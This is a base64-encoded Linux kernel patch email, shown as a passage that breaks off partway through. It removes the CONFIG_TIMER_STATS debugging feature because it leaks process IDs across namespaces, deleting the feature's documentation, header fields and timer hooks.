-RnJvbSAwNDA3YzdhMmY0NzM0Y2Q1NTkwMjc1M2Q3ODhmZGJkYzMyZWQ3ZmQ5IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBLZWVzIENvb2sgPGtlZXNjb29rQGNocm9taXVtLm9yZz4KRGF0ZTogV2VkLCAwOCBGZWIgMjAxNyAxMToyNjo1OSAtMDgwMApTdWJqZWN0OiBbUEFUQ0hdIHRpbWU6IFJlbW92ZSBDT05GSUdfVElNRVJfU1RBVFMKCkN1cnJlbnRseSBDT05GSUdfVElNRVJfU1RBVFMgZXhwb3NlcyBwcm9jZXNzIGluZm9ybWF0aW9uIGFjcm9zcyBuYW1lc3BhY2VzOgoKa2VybmVsL3RpbWUvdGltZXJfbGlzdC5jIHByaW50X3RpbWVyKCk6CgogICAgICAgIFNFUV9wcmludGYobSwgIiwgJXMvJWQiLCB0bXAsIHRpbWVyLT5zdGFydF9waWQpOwoKL3Byb2MvdGltZXJfbGlzdDoKCiAjMTE6IDwwMDAwMDAwMDAwMDAwMDAwPiwgaHJ0aW1lcl93YWtldXAsIFM6MDEsIGRvX25hbm9zbGVlcCwgY3Jvbi8yNTcwCgpHaXZlbiB0aGF0IHRoZSB0cmFjZXIgY2FuIGdpdmUgdGhlIHNhbWUgaW5mb3JtYXRpb24sIHRoaXMgcGF0Y2ggZW50aXJlbHkKcmVtb3ZlcyBDT05GSUdfVElNRVJfU1RBVFMuCgpDaGFuZ2UtSWQ6IEljZTI2ZDc0MDk0ZDNhZDU2MzgwODM0MmMxNjA0YWQ0NDQyMzQ4NDRiClN1Z2dlc3RlZC1ieTogVGhvbWFzIEdsZWl4bmVyIDx0Z2x4QGxpbnV0cm9uaXguZGU+ClNpZ25lZC1vZmYtYnk6IEtlZXMgQ29vayA8a2Vlc2Nvb2tAY2hyb21pdW0ub3JnPgpBY2tlZC1ieTogSm9obiBTdHVsdHogPGpvaG4uc3R1bHR6QGxpbmFyby5vcmc+CkNjOiBOaWNvbGFzIFBpdHJlIDxuaWNvbGFzLnBpdHJlQGxpbmFyby5vcmc+CkNjOiBsaW51eC1kb2NAdmdlci5rZXJuZWwub3JnCkNjOiBMYWkgSmlhbmdzaGFuIDxqaWFuZ3NoYW5sYWlAZ21haWwuY29tPgpDYzogU2h1YWggS2hhbiA8c2h1YWhAa2VybmVsLm9yZz4KQ2M6IFhpbmcgR2FvIDx4Z2FvMDFAZW1haWwud20uZWR1PgpDYzogSm9uYXRoYW4gQ29yYmV0IDxjb3JiZXRAbHduLm5ldD4KQ2M6IEplc3NpY2EgRnJhemVsbGUgPG1lQGplc3NmcmF6LmNvbT4KQ2M6IGtlcm5lbC1oYXJkZW5pbmdAbGlzdHMub3BlbndhbGwuY29tCkNjOiBOaWNvbGFzIElvb3NzIDxuaWNvbGFzLmlvb3NzX2xpbnV4QG00eC5vcmc+CkNjOiAiUGF1bCBFLiBNY0tlbm5leSIgPHBhdWxtY2tAbGludXgudm5ldC5pYm0uY29tPgpDYzogUGV0ciBNbGFkZWsgPHBtbGFkZWtAc3VzZS5jb20+CkNjOiBSaWNoYXJkIENvY2hyYW4gPHJpY2hhcmRjb2NocmFuQGdtYWlsLmNvbT4KQ2M6IFRlanVuIEhlbyA8dGpAa2VybmVsLm9yZz4KQ2M6IE1pY2hhbCBNYXJlayA8bW1hcmVrQHN1c2UuY29tPgpDYzogSm9zaCBQb2ltYm9ldWYgPGpwb2ltYm9lQHJlZGhhdC5jb20+CkNjOiBEbWl0cnkgVnl1a292IDxkdnl1a292QGdvb2dsZS5jb20+CkNjOiBPbGVnIE5lc3Rlcm92IDxvbGVnQHJlZGhhdC5jb20+CkNjOiAiRXJpYyBXLiBCaWVkZXJtYW4iIDxlYmllZGVybUB4bWlzc2lvbi5jb20+CkNjOiBPbG9mIEpvaGFuc3NvbiA8b2xvZkBsaXhvbS5uZXQ+CkNjOiBBbmRyZXcgTW9ydG9uIDxha3BtQGxpbnV4LWZvdW5kYXRpb24ub3JnPgpDYzogbGludXgtYXBpQHZnZXIua2VybmVsLm9yZwpDYzogQXJqYW4gdmFuIGRlIFZlbiA8YXJqYW5AbGludXguaW50ZWwuY29tPgpMaW5rOiBodHRwOi8vbGttbC5rZXJuZWwub3JnL3IvMjAxNzAyMDgxOTI2NTkuR0EzMjU4MkBiZWFzdApTaWduZWQtb2ZmLWJ5OiBUaG9tYXMgR2xlaXhuZXIgPHRnbHhAbGludXRyb25peC5kZT4KLS0tCgpkaWZmIC0tZ2l0IGEvRG9jdW1lbnRhdGlvbi90aW1lcnMvdGltZXJfc3RhdHMudHh0IGIvRG9jdW1lbnRhdGlvbi90aW1lcnMvdGltZXJfc3RhdHMudHh0CmRlbGV0ZWQgZmlsZSBtb2RlIDEwMDY0NAppbmRleCA4YWJkNDBiLi4wMDAwMDAwCi0tLSBhL0RvY3VtZW50YXRpb24vdGltZXJzL3RpbWVyX3N0YXRzLnR4dAorKysgL2Rldi9udWxsCkBAIC0xLDczICswLDAgQEAKLXRpbWVyX3N0YXRzIC0gdGltZXIgdXNhZ2Ugc3RhdGlzdGljcwotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCi0KLXRpbWVyX3N0YXRzIGlzIGEgZGVidWdnaW5nIGZhY2lsaXR5IHRvIG1ha2UgdGhlIHRpbWVyIChhYil1c2FnZSBpbiBhIExpbnV4Ci1zeXN0ZW0gdmlzaWJsZSB0byBrZXJuZWwgYW5kIHVzZXJzcGFjZSBkZXZlbG9wZXJzLiBJZiBlbmFibGVkIGluIHRoZSBjb25maWcKLWJ1dCBub3QgdXNlZCBpdCBoYXMgYWxtb3N0IHplcm8gcnVudGltZSBvdmVyaGVhZCwgYW5kIGEgcmVsYXRpdmVseSBzbWFsbAotZGF0YSBzdHJ1Y3R1cmUgb3ZlcmhlYWQuIEV2ZW4gaWYgY29sbGVjdGlvbiBpcyBlbmFibGVkIHJ1bnRpbWUgYWxsIHRoZQotbG9ja2luZyBpcyBwZXItQ1BVIGFuZCBsb29rdXAgaXMgaGFzaGVkLgotCi10aW1lcl9zdGF0cyBzaG91bGQgYmUgdXNlZCBieSBrZXJuZWwgYW5kIHVzZXJzcGFjZSBkZXZlbG9wZXJzIHRvIHZlcmlmeSB0aGF0Ci10aGVpciBjb2RlIGRvZXMgbm90IG1ha2UgdW5kdWx5IHVzZSBvZiB0aW1lcnMuIFRoaXMgaGVscHMgdG8gYXZvaWQgdW5uZWNlc3NhcnkKLXdha2V1cHMsIHdoaWNoIHNob3VsZCBiZSBhdm9pZGVkIHRvIG9wdGltaXplIHBvd2VyIGNvbnN1bXB0aW9uLgotCi1JdCBjYW4gYmUgZW5hYmxlZCBieSBDT05GSUdfVElNRVJfU1RBVFMgaW4gdGhlICJLZXJuZWwgaGFja2luZyIgY29uZmlndXJhdGlvbgotc2VjdGlvbi4KLQotdGltZXJfc3RhdHMgY29sbGVjdHMgaW5mb3JtYXRpb24gYWJvdXQgdGhlIHRpbWVyIGV2ZW50cyB3aGljaCBhcmUgZmlyZWQgaW4gYQotTGludXggc3lzdGVtIG92ZXIgYSBzYW1wbGUgcGVyaW9kOgotCi0tIHRoZSBwaWQgb2YgdGhlIHRhc2socHJvY2Vzcykgd2hpY2ggaW5pdGlhbGl6ZWQgdGhlIHRpbWVyCi0tIHRoZSBuYW1lIG9mIHRoZSBwcm9jZXNzIHdoaWNoIGluaXRpYWxpemVkIHRoZSB0aW1lcgotLSB0aGUgZnVuY3Rpb24gd2hlcmUgdGhlIHRpbWVyIHdhcyBpbml0aWFsaXplZAotLSB0aGUgY2FsbGJhY2sgZnVuY3Rpb24gd2hpY2ggaXMgYXNzb2NpYXRlZCB0byB0aGUgdGltZXIKLS0gdGhlIG51bWJlciBvZiBldmVudHMgKGNhbGxiYWNrcykKLQotdGltZXJfc3RhdHMgYWRkcyBhbiBlbnRyeSB0byAvcHJvYzogL3Byb2MvdGltZXJfc3RhdHMKLQotVGhpcyBlbnRyeSBpcyB1c2VkIHRvIGNvbnRyb2wgdGhlIHN0YXRpc3RpY3MgZnVuY3Rpb25hbGl0eSBhbmQgdG8gcmVhZCBvdXQgdGhlCi1zYW1wbGVkIGluZm9ybWF0aW9uLgotCi1UaGUgdGltZXJfc3RhdHMgZnVuY3Rpb25hbGl0eSBpcyBpbmFjdGl2ZSBvbiBib290dXAuCi0KLVRvIGFjdGl2YXRlIGEgc2FtcGxlIHBlcmlvZCBpc3N1ZToKLSMgZWNobyAxID4vcHJvYy90aW1lcl9zdGF0cwotCi1UbyBzdG9wIGEgc2FtcGxlIHBlcmlvZCBpc3N1ZToKLSMgZWNobyAwID4vcHJvYy90aW1lcl9zdGF0cwotCi1UaGUgc3RhdGlzdGljcyBjYW4gYmUgcmV0cmlldmVkIGJ5OgotIyBjYXQgL3Byb2MvdGltZXJfc3RhdHMKLQotVGhlIHJlYWRvdXQgb2YgL3Byb2MvdGltZXJfc3RhdHMgYXV0b21hdGljYWxseSBkaXNhYmxlcyBzYW1wbGluZy4gVGhlIHNhbXBsZWQKLWluZm9ybWF0aW9uIGlzIGtlcHQgdW50aWwgYSBuZXcgc2FtcGxlIHBlcmlvZCBpcyBzdGFydGVkLiBUaGlzIGFsbG93cyBtdWx0aXBsZQotcmVhZG91dHMuCi0KLVNhbXBsZSBvdXRwdXQgb2YgL3Byb2MvdGltZXJfc3RhdHM6Ci0KLVRpbWVyc3RhdHMgc2FtcGxlIHBlcmlvZDogMy44ODg3NzAgcwotICAxMiwgICAgIDAgc3dhcHBlciAgICAgICAgICBocnRpbWVyX3N0b3Bfc2NoZWRfdGljayAoaHJ0aW1lcl9zY2hlZF90aWNrKQotICAxNSwgICAgIDEgc3dhcHBlciAgICAgICAgICBoY2Rfc3VibWl0X3VyYiAocmhfdGltZXJfZnVuYykKLSAgIDQsICAgOTU5IGtlZGFjICAgICAgICAgICAgc2NoZWR1bGVfdGltZW91dCAocHJvY2Vzc190aW1lb3V0KQotICAgMSwgICAgIDAgc3dhcHBlciAgICAgICAgICBwYWdlX3dyaXRlYmFja19pbml0ICh3Yl90aW1lcl9mbikKLSAgMjgsICAgICAwIHN3YXBwZXIgICAgICAgICAgaHJ0aW1lcl9zdG9wX3NjaGVkX3RpY2sgKGhydGltZXJfc2NoZWRfdGljaykKLSAgMjIsICAyOTQ4IElSUSA0ICAgICAgICAgICAgdHR5X2ZsaXBfYnVmZmVyX3B1c2ggKGRlbGF5ZWRfd29ya190aW1lcl9mbikKLSAgIDMsICAzMTAwIGJhc2ggICAgICAgICAgICAgc2NoZWR1bGVfdGltZW91dCAocHJvY2Vzc190aW1lb3V0KQotICAgMSwgICAgIDEgc3dhcHBlciAgICAgICAgICBxdWV1ZV9kZWxheWVkX3dvcmtfb24gKGRlbGF5ZWRfd29ya190aW1lcl9mbikKLSAgIDEsICAgICAxIHN3YXBwZXIgICAgICAgICAgcXVldWVfZGVsYXllZF93b3JrX29uIChkZWxheWVkX3dvcmtfdGltZXJfZm4pCi0gICAxLCAgICAgMSBzd2FwcGVyICAgICAgICAgIG5laWdoX3RhYmxlX2luaXRfbm9fbmV0bGluayAobmVpZ2hfcGVyaW9kaWNfdGltZXIpCi0gICAxLCAgMjI5MiBpcCAgICAgICAgICAgICAgIF9fbmV0ZGV2X3dhdGNoZG9nX3VwIChkZXZfd2F0Y2hkb2cpCi0gICAxLCAgICAyMyBldmVudHMvMSAgICAgICAgIGRvX2NhY2hlX2NsZWFuIChkZWxheWVkX3dvcmtfdGltZXJfZm4pCi05MCB0b3RhbCBldmVudHMsIDMwLjAgZXZlbnRzL3NlYwotCi1UaGUgZmlyc3QgY29sdW1uIGlzIHRoZSBudW1iZXIgb2YgZXZlbnRzLCB0aGUgc2Vjb25kIGNvbHVtbiB0aGUgcGlkLCB0aGUgdGhpcmQKLWNvbHVtbiBpcyB0aGUgbmFtZSBvZiB0aGUgcHJvY2Vzcy4gVGhlIGZvcnRoIGNvbHVtbiBzaG93cyB0aGUgZnVuY3Rpb24gd2hpY2gKLWluaXRpYWxpemVkIHRoZSB0aW1lciBhbmQgaW4gcGFyZW50aGVzaXMgdGhlIGNhbGxiYWNrIGZ1bmN0aW9uIHdoaWNoIHdhcwotZXhlY3V0ZWQgb24gZXhwaXJ5LgotCi0gICAgVGhvbWFzLCBJbmdvCi0KLUFkZGVkIGZsYWcgdG8gaW5kaWNhdGUgJ2RlZmVycmFibGUgdGltZXInIGluIC9wcm9jL3RpbWVyX3N0YXRzLiBBIGRlZmVycmFibGUKLXRpbWVyIHdpbGwgYXBwZWFyIGFzIGZvbGxvd3MKLSAgMTBELCAgICAgMSBzd2FwcGVyICAgICAgICAgIHF1ZXVlX2RlbGF5ZWRfd29ya19vbiAoZGVsYXllZF93b3JrX3RpbWVyX2ZuKQotCmRpZmYgLS1naXQgYS9pbmNsdWRlL2xpbnV4L2hydGltZXIuaCBiL2luY2x1ZGUvbGludXgvaHJ0aW1lci5oCmluZGV4IDAzMDJiYmUuLjc2NWQ5ZTcgMTAwNjQ0Ci0tLSBhL2luY2x1ZGUvbGludXgvaHJ0aW1lci5oCisrKyBiL2luY2x1ZGUvbGludXgvaHJ0aW1lci5oCkBAIC05NiwxMiArOTYsNiBAQAogICogQGZ1bmN0aW9uOgl0aW1lciBleHBpcnkgY2FsbGJhY2sgZnVuY3Rpb24KICAqIEBiYXNlOglwb2ludGVyIHRvIHRoZSB0aW1lciBiYXNlIChwZXIgY3B1IGFuZCBwZXIgY2xvY2spCiAgKiBAc3RhdGU6CXN0YXRlIGluZm9ybWF0aW9uIChTZWUgYml0IHZhbHVlcyBhYm92ZSkKLSAqIEBzdGFydF9zaXRlOgl0aW1lciBzdGF0aXN0aWNzIGZpZWxkIHRvIHN0b3JlIHRoZSBzaXRlIHdoZXJlIHRoZSB0aW1lcgotICoJCXdhcyBzdGFydGVkCi0gKiBAc3RhcnRfY29tbTogdGltZXIgc3RhdGlzdGljcyBmaWVsZCB0byBzdG9yZSB0aGUgbmFtZSBvZiB0aGUgcHJvY2VzcyB3aGljaAotICoJCXN0YXJ0ZWQgdGhlIHRpbWVyCi0gKiBAc3RhcnRfcGlkOiB0aW1lciBzdGF0aXN0aWNzIGZpZWxkIHRvIHN0b3JlIHRoZSBwaWQgb2YgdGhlIHRhc2sgd2hpY2gKLSAqCQlzdGFydGVkIHRoZSB0aW1lcgogICoKICAqIFRoZSBocnRpbWVyIHN0cnVjdHVyZSBtdXN0IGJlIGluaXRpYWxpemVkIGJ5IGhydGltZXJfaW5pdCgpCiAgKi8KQEAgLTExMSwxMSArMTA1LDYgQEAKIAllbnVtIGhydGltZXJfcmVzdGFydAkJKCpmdW5jdGlvbikoc3RydWN0IGhydGltZXIgKik7CiAJc3RydWN0IGhydGltZXJfY2xvY2tfYmFzZQkqYmFzZTsKIAl1bnNpZ25lZCBsb25nCQkJc3RhdGU7Ci0jaWZkZWYgQ09ORklHX1RJTUVSX1NUQVRTCi0JaW50CQkJCXN0YXJ0X3BpZDsKLQl2b2lkCQkJCSpzdGFydF9zaXRlOwotCWNoYXIJCQkJc3RhcnRfY29tbVsxNl07Ci0jZW5kaWYKIH07CiAKIC8qKgpkaWZmIC0tZ2l0IGEvaW5jbHVkZS9saW51eC90aW1lci5oIGIvaW5jbHVkZS9saW51eC90aW1lci5oCmluZGV4IDhjNWExOTcuLjdjOGFkZmEgMTAwNjQ0Ci0tLSBhL2luY2x1ZGUvbGludXgvdGltZXIuaAorKysgYi9pbmNsdWRlL2xpbnV4L3RpbWVyLmgKQEAgLTIzLDExICsyMyw2IEBACiAKIAlpbnQgc2xhY2s7CiAKLSNpZmRlZiBDT05GSUdfVElNRVJfU1RBVFMKLQlpbnQgc3RhcnRfcGlkOwotCXZvaWQgKnN0YXJ0X3NpdGU7Ci0JY2hhciBzdGFydF9jb21tWzE2XTsKLSNlbmRpZgogI2lmZGVmIENPTkZJR19MT0NLREVQCiAJc3RydWN0IGxvY2tkZXBfbWFwIGxvY2tkZXBfbWFwOwogI2VuZGlmCkBAIC0xOTMsNDkgKzE4OCw2IEBACiAgKiBqaWZmaWUuCiAgKi8KIGV4dGVybiB1bnNpZ25lZCBsb25nIGdldF9uZXh0X3RpbWVyX2ludGVycnVwdCh1bnNpZ25lZCBsb25nIG5vdyk7Ci0KLS8qCi0gKiBUaW1lci1zdGF0aXN0aWNzIGluZm86Ci0gKi8KLSNpZmRlZiBDT05GSUdfVElNRVJfU1RBVFMKLQotZXh0ZXJuIGludCB0aW1lcl9zdGF0c19hY3RpdmU7Ci0KLSNkZWZpbmUgVElNRVJfU1RBVFNfRkxBR19ERUZFUlJBQkxFCTB4MQotCi1leHRlcm4gdm9pZCBpbml0X3RpbWVyX3N0YXRzKHZvaWQpOwotCi1leHRlcm4gdm9pZCB0aW1lcl9zdGF0c191cGRhdGVfc3RhdHModm9pZCAqdGltZXIsIHBpZF90IHBpZCwgdm9pZCAqc3RhcnRmLAotCQkJCSAgICAgdm9pZCAqdGltZXJmLCBjaGFyICpjb21tLAotCQkJCSAgICAgdW5zaWduZWQgaW50IHRpbWVyX2ZsYWcpOwotCi1leHRlcm4gdm9pZCBfX3RpbWVyX3N0YXRzX3RpbWVyX3NldF9zdGFydF9pbmZvKHN0cnVjdCB0aW1lcl9saXN0ICp0aW1lciwKLQkJCQkJICAgICAgIHZvaWQgKmFkZHIpOwotCi1zdGF0aWMgaW5saW5lIHZvaWQgdGltZXJfc3RhdHNfdGltZXJfc2V0X3N0YXJ0X2luZm8oc3RydWN0IHRpbWVyX2xpc3QgKnRpbWVyKQotewotCWlmIChsaWtlbHkoIXRpbWVyX3N0YXRzX2FjdGl2ZSkpCi0JCXJldHVybjsKLQlfX3RpbWVyX3N0YXRzX3RpbWVyX3NldF9zdGFydF9pbmZvKHRpbWVyLCBfX2J1aWx0aW5fcmV0dXJuX2FkZHJlc3MoMCkpOwotfQotCi1zdGF0aWMgaW5saW5lIHZvaWQgdGltZXJfc3RhdHNfdGltZXJfY2xlYXJfc3RhcnRfaW5mbyhzdHJ1Y3QgdGltZXJfbGlzdCAqdGltZXIpCi17Ci0JdGltZXItPnN0YXJ0X3NpdGUgPSBOVUxMOwotfQotI2Vsc2UKLXN0YXRpYyBpbmxpbmUgdm9pZCBpbml0X3RpbWVyX3N0YXRzKHZvaWQpCi17Ci19Ci0KLXN0YXRpYyBpbmxpbmUgdm9pZCB0aW1lcl9zdGF0c190aW1lcl9zZXRfc3RhcnRfaW5mbyhzdHJ1Y3QgdGltZXJfbGlzdCAqdGltZXIpCi17Ci19Ci0KLXN0YXRpYyBpbmxpbmUgdm9pZCB0aW1lcl9zdGF0c190aW1lcl9jbGVhcl9zdGFydF9pbmZvKHN0cnVjdCB0aW1lcl9saXN0ICp0aW1lcikKLXsKLX0KLSNlbmRpZgogCiBleHRlcm4gdm9pZCBhZGRfdGltZXIoc3RydWN0IHRpbWVyX2xpc3QgKnRpbWVyKTsKIApkaWZmIC0tZ2l0IGEva2VybmVsL2hydGltZXIuYyBiL2tlcm5lbC9ocnRpbWVyLmMKaW5kZXggNDcwNjdkZS4uYzljM2E2YyAxMDA2NDQKLS0tIGEva2VybmVsL2hydGltZXIuYworKysgYi9rZXJuZWwvaHJ0aW1lci5jCkBAIC04MjcsMzQgKzgyNyw2IEBACiAJY2xvY2tfd2FzX3NldF9kZWxheWVkKCk7CiB9CiAKLXN0YXRpYyBpbmxpbmUgdm9pZCB0aW1lcl9zdGF0c19ocnRpbWVyX3NldF9zdGFydF9pbmZvKHN0cnVjdCBocnRpbWVyICp0aW1lcikKLXsKLSNpZmRlZiBDT05GSUdfVElNRVJfU1RBVFMKLQlpZiAodGltZXItPnN0YXJ0X3NpdGUpCi0JCXJldHVybjsKLQl0aW1lci0+c3RhcnRfc2l0ZSA9IF9fYnVpbHRpbl9yZXR1cm5fYWRkcmVzcygwKTsKLQltZW1jcHkodGltZXItPnN0YXJ0X2NvbW0sIGN1cnJlbnQtPmNvbW0sIFRBU0tfQ09NTV9MRU4pOwotCXRpbWVyLT5zdGFydF9waWQgPSBjdXJyZW50LT5waWQ7Ci0jZW5kaWYKLX0KLQotc3RhdGljIGlubGluZSB2b2lkIHRpbWVyX3N0YXRzX2hydGltZXJfY2xlYXJfc3RhcnRfaW5mbyhzdHJ1Y3QgaHJ0aW1lciAqdGltZXIpCi17Ci0jaWZkZWYgQ09ORklHX1RJTUVSX1NUQVRTCi0JdGltZXItPnN0YXJ0X3NpdGUgPSBOVUxMOwotI2VuZGlmCi19Ci0KLXN0YXRpYyBpbmxpbmUgdm9pZCB0aW1lcl9zdGF0c19hY2NvdW50X2hydGltZXIoc3RydWN0IGhydGltZXIgKnRpbWVyKQotewotI2lmZGVmIENPTkZJR19USU1FUl9TVEFUUwotCWlmIChsaWtlbHkoIXRpbWVyX3N0YXRzX2FjdGl2ZSkpCi0JCXJldHVybjsKLQl0aW1lcl9zdGF0c191cGRhdGVfc3RhdHModGltZXIsIHRpbWVyLT5zdGFydF9waWQsIHRpbWVyLT5zdGFydF9zaXRlLAotCQkJCSB0aW1lci0+ZnVuY3Rpb24sIHRpbWVyLT5zdGFydF9jb21tLCAwKTsKLSNlbmRpZgotfQotCiAvKgogICogQ291bnRlcnBhcnQgdG8gbG9ja19ocnRpbWVyX2Jhc2UgYWJvdmU6CiAgKi8KQEAgLTk4OCw3ICs5NjAsNiBAQAogCQkgKiByYXJlIGNhc2UgYW5kIGxlc3MgZXhwZW5zaXZlIHRoYW4gYSBzbXAgY2FsbC4KIAkJICovCiAJCWRlYnVnX2RlYWN0aXZhdGUodGltZXIpOwotCQl0aW1lcl9zdGF0c19ocnRpbWVyX2NsZWFyX3N0YXJ0X2luZm8odGltZXIpOwogCQlyZXByb2dyYW0gPSBiYXNlLT5jcHVfYmFzZSA9PSAmX19nZXRfY3B1X3ZhcihocnRpbWVyX2Jhc2VzKTsKIAkJLyoKIAkJICogV2UgbXVzdCBwcmVzZXJ2ZSB0aGUgQ0FMTEJBQ0sgc3RhdGUgZmxhZyBoZXJlLApAQCAtMTAzMyw4ICsxMDA0LDYgQEAKIAogCS8qIFN3aXRjaCB0aGUgdGltZXIgYmFzZSwgaWYgbmVjZXNzYXJ5OiAqLwogCW5ld19iYXNlID0gc3dpdGNoX2hydGltZXJfYmFzZSh0aW1lciwgYmFzZSwgbW9kZSAmIEhSVElNRVJfTU9ERV9QSU5ORUQpOwotCi0JdGltZXJfc3RhdHNfaHJ0aW1lcl9zZXRfc3RhcnRfaW5mbyh0aW1lcik7CiAKIAlsZWZ0bW9zdCA9IGVucXVldWVfaHJ0aW1lcih0aW1lciwgbmV3X2Jhc2UpOwogCkBAIC0xMjExLDEyICsxMTgwLDYgQEAKIAliYXNlID0gaHJ0aW1lcl9jbG9ja2lkX3RvX2Jhc2UoY2xvY2tfaWQpOwogCXRpbWVyLT5iYXNlID0gJmNwdV9iYXNlLT5jbG9ja19iYXNlW2Jhc2VdOwogCXRpbWVycXVldWVfaW5pdCgmdGltZXItPm5vZGUpOwotCi0jaWZkZWYgQ09ORklHX1RJTUVSX1NUQVRTCi0JdGltZXItPnN0YXJ0X3NpdGUgPSBOVUxMOwotCXRpbWVyLT5zdGFydF9waWQgPSAtMTsKLQltZW1zZXQodGltZXItPnN0YXJ0X2NvbW0sIDAsIFRBU0tfQ09NTV9MRU4pOwotI2VuZGlmCiB9CiAKIC8qKgpAQCAtMTI2NCw3ICsxMjI3LDYgQEAKIAogCWRlYnVnX2RlYWN0aXZhdGUodGltZXIpOwogCV9fcmVtb3ZlX2hydGltZXIodGltZXIsIGJhc2UsIEhSVElNRVJfU1RBVEVfQ0FMTEJBQ0ssIDApOwotCXRpbWVyX3N0YXRzX2FjY291bnRfaHJ0aW1lcih0aW1lcik7CiAJZm4gPSB0aW1lci0+ZnVuY3Rpb247CiAKIAkvKgpkaWZmIC0tZ2l0IGEva2VybmVsL3RpbWUvTWFrZWZpbGUgYi9rZXJuZWwvdGltZS9NYWtlZmlsZQppbmRleCBhYTkxYWY1Li5mZDg3ZTUxIDEwMDY0NAotLS0gYS9rZXJuZWwvdGltZS9NYWtlZmlsZQorKysgYi9rZXJuZWwvdGltZS9NYWtlZmlsZQpAQCAtNyw0ICs3LDMgQEAKIG9iai0kKENPTkZJR19HRU5FUklDX1NDSEVEX0NMT0NLKQkJKz0gc2NoZWRfY2xvY2subwogb2JqLSQoQ09ORklHX1RJQ0tfT05FU0hPVCkJCQkrPSB0aWNrLW9uZXNob3Qubwogb2JqLSQoQ09ORklHX1RJQ0tfT05FU0hPVCkJCQkrPSB0aWNrLXNjaGVkLm8KLW9iai0kKENPTkZJR19USU1FUl9TVEFUUykJCQkrPSB0aW1lcl9zdGF0cy5vCmRpZmYgLS1naXQgYS9rZXJuZWwvdGltZS90aW1lcl9saXN0LmMgYi9rZXJuZWwvdGltZS90aW1lcl9saXN0LmMKaW5kZXggNjFlZDg2Mi4uZjZhMTA0MyAxMDA2NDQKLS0tIGEva2VybmVsL3RpbWUvdGltZXJfbGlzdC5jCisrKyBiL2tlcm5lbC90aW1lL3RpbWVyX2xpc3QuYwpAQCAtNTcsMjEgKzU3LDExIEBACiBwcmludF90aW1lcihzdHJ1Y3Qgc2VxX2ZpbGUgKm0sIHN0cnVjdCBocnRpbWVyICp0YWRkciwgc3RydWN0IGhydGltZXIgKnRpbWVyLAogCSAgICBpbnQgaWR4LCB1NjQgbm93KQogewotI2lmZGVmIENPTkZJR19USU1FUl9TVEFUUwotCWNoYXIgdG1wW1RBU0tfQ09NTV9MRU4gKyAxXTsKLSNlbmRpZgogCVNFUV9wcmludGYobSwgIiAjJWQ6ICIsIGlkeCk7CiAJcHJpbnRfbmFtZV9vZmZzZXQobSwgdGFkZHIpOwogCVNFUV9wcmludGYobSwgIiwgIik7CiAJcHJpbnRfbmFtZV9vZmZzZXQobSwgdGltZXItPmZ1bmN0aW9uKTsKIAlTRVFfcHJpbnRmKG0sICIsIFM6JTAybHgiLCB0aW1lci0+c3RhdGUpOwotI2lmZGVmIENPTkZJR19USU1FUl9TVEFUUwotCVNFUV9wcmludGYobSwgIiwgIik7Ci0JcHJpbnRfbmFtZV9vZmZzZXQobSwgdGltZXItPnN0YXJ0X3NpdGUpOwotCW1lbWNweSh0bXAsIHRpbWVyLT5zdGFydF9jb21tLCBUQVNLX0NPTU1fTEVOKTsKLQl0bXBbVEFTS19DT01NX0xFTl0gPSAwOwotCVNFUV9wcmludGYobSwgIiwgJXMvJWQiLCB0bXAsIHRpbWVyLT5zdGFydF9waWQpOwotI2VuZGlmCiAJU0VRX3ByaW50ZihtLCAiXG4iKTsKIAlTRVFfcHJpbnRmKG0sICIgIyBleHBpcmVzIGF0ICVMdS0lTHUgbnNlY3MgW2luICVMZCB0byAlTGQgbnNlY3NdXG4iLAogCQkodW5zaWduZWQgbG9uZyBsb25nKWt0aW1lX3RvX25zKGhydGltZXJfZ2V0X3NvZnRleHBpcmVzKHRpbWVyKSksCmRpZmYgLS1naXQgYS9rZXJuZWwvdGltZS90aW1lcl9zdGF0cy5jIGIva2VybmVsL3RpbWUvdGltZXJfc3RhdHMuYwpkZWxldGVkIGZpbGUgbW9kZSAxMDA2NDQKaW5kZXggMGI1MzdmMi4uMDAwMDAwMAotLS0gYS9rZXJuZWwvdGltZS90aW1lcl9zdGF0cy5jCisrKyAvZGV2L251bGwKQEAgLTEsNDI1ICswLDAgQEAKLS8qCi0gKiBrZXJuZWwvdGltZS90aW1lcl9zdGF0cy5jCi0gKgotICogQ29sbGVjdCB0aW1lciB1c2FnZSBzdGF0aXN0aWNzLgotICoKLSAqIENvcHlyaWdodChDKSAyMDA2LCBSZWQgSGF0LCBJbmMuLCBJbmdvIE1vbG5hcgotICogQ29weXJpZ2h0KEMpIDIwMDYgVGltZXN5cyBDb3JwLiwgVGhvbWFzIEdsZWl4bmVyIDx0Z2x4QHRpbWVzeXMuY29tPgotICoKLSAqIHRpbWVyX3N0YXRzIGlzIGJhc2VkIG9uIHRpbWVyX3RvcCwgYSBzaW1pbGFyIGZ1bmN0aW9uYWxpdHkgd2hpY2ggd2FzIHBhcnQgb2YKLSAqIENvbiBLb2xpdmFzIGR5bnRpY2sgcGF0Y2ggc2V0LiBJdCB3YXMgZGV2ZWxvcGVkIGJ5IERhbmllbCBQZXRyaW5pIGF0IHRoZQotICogSW5zdGl0dXRvIE5va2lhIGRlIFRlY25vbG9naWEgLSBJTmRUIC0gTWFuYXVzLiB0aW1lcl90b3AncyBkZXNpZ24gd2FzIGJhc2VkCi0gKiBvbiBkeW5hbWljIGFsbG9jYXRpb24gb2YgdGhlIHN0YXRpc3RpY3MgZW50cmllcyBhbmQgbGluZWFyIHNlYXJjaCBiYXNlZAotICogbG9va3VwIGNvbWJpbmVkIHdpdGggYSBnbG9iYWwgbG9jaywgcmF0aGVyIHRoYW4gdGhlIHN0YXRpYyBhcnJheSwgaGFzaAotICogYW5kIHBlci1DUFUgbG9ja2luZyB3aGljaCBpcyB1c2VkIGJ5IHRpbWVyX3N0YXRzLiBJdCB3YXMgd3JpdHRlbiBmb3IgdGhlCi0gKiBwcmUgaHJ0aW1lciBrZXJuZWwgY29kZSBhbmQgdGhlcmVmb3JlIGRpZCBub3QgdGFrZSBocnRpbWVycyBpbnRvIGFjY291bnQuCi0gKiBOZXZlcnRoZWxlc3MgaXQgcHJvdmlkZWQgdGhlIGJhc2UgZm9yIHRoZSB0aW1lcl9zdGF0cyBpbXBsZW1lbnRhdGlvbiBhbmQKLSAqIHdhcyBhIGhlbHBmdWwgc291cmNlIG9mIGluc3BpcmF0aW9uLiBLdWRvcyB0byBEYW5pZWwgYW5kIHRoZSBOb2tpYSBmb2xrcwotICogZm9yIHRoaXMgZW